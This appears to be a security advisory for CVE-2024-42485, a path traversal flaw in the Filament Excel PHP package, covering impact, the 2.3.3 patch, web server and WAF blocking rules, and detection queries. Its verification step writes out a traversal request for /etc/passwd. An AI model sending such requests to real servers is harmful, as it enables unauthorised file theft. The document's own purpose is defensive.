CVE-2024-42485
📋 TL;DR
CVE-2024-42485 is a path traversal vulnerability in Filament Excel that allows unauthenticated attackers to download arbitrary files from the server via the `/filament-excel/{path}` endpoint when directory traversal sequences like `../` are permitted. This affects all Filament Excel users with vulnerable versions exposed to untrusted networks.
💻 Affected Systems
- pxlrbt/filament-excel
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete server compromise through downloading sensitive files like configuration files, SSH keys, or database credentials, leading to data breach and system takeover.
Likely Case
Unauthorized access to sensitive application files, configuration data, or user data stored on the server filesystem.
If Mitigated
Limited impact if proper network segmentation and file permission controls restrict access to sensitive directories.
🎯 Exploit Status
Exploitation is straightforward via crafted URLs with directory traversal sequences targeting the vulnerable endpoint.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: v2.3.3
Vendor Advisory: https://github.com/pxlrbt/filament-excel/security/advisories/GHSA-m3px-vjxr-fx4m
Restart Required: No
Instructions:
1. Update Filament Excel to version 2.3.3 or later via Composer: `composer require pxlrbt/filament-excel:^2.3.3`. 2. Verify the update completed successfully. 3. No server restart required for PHP applications.
🔧 Temporary Workarounds
Web Server Path Traversal Protection
allConfigure web server (e.g., Apache, Nginx) to block directory traversal sequences in URLs.
For Nginx: Add `if ($request_uri ~* "\.\.") { return 403; }` to server block
For Apache: Use mod_security rules or .htaccess to filter ../ patterns
Application Firewall Rule
allImplement WAF rules to block requests containing directory traversal patterns to the vulnerable endpoint.
Example ModSecurity rule: SecRule REQUEST_URI "@rx \.\./" "id:1001,phase:1,deny,status:403"
🧯 If You Can't Patch
- Restrict network access to the Filament admin interface using firewall rules to allow only trusted IPs.
- Implement authentication middleware for the `/filament-excel/{path}` route if not already present in your custom implementation.
🔍 How to Verify
Check if Vulnerable:
Check if running Filament Excel version below 2.3.3 and test if `/filament-excel/../../etc/passwd` (or similar traversal) returns sensitive files without authentication.Check Version:
composer show pxlrbt/filament-excel | grep versionsVerify Fix Applied:
After updating to v2.3.3+, attempt the same path traversal request; it should return an error or be blocked.📡 Detection & Monitoring
Log Indicators:
- HTTP 200/206 responses to `/filament-excel/` paths containing `../` sequences
- Unusual file access patterns from unauthenticated sessions
Network Indicators:
- GET requests to `/filament-excel/{path}` with directory traversal patterns from untrusted sources
SIEM Query:
source="web_logs" AND uri="/filament-excel/*" AND (uri="*../*" OR uri="*..\\*" OR uri="*%2e%2e%2f*")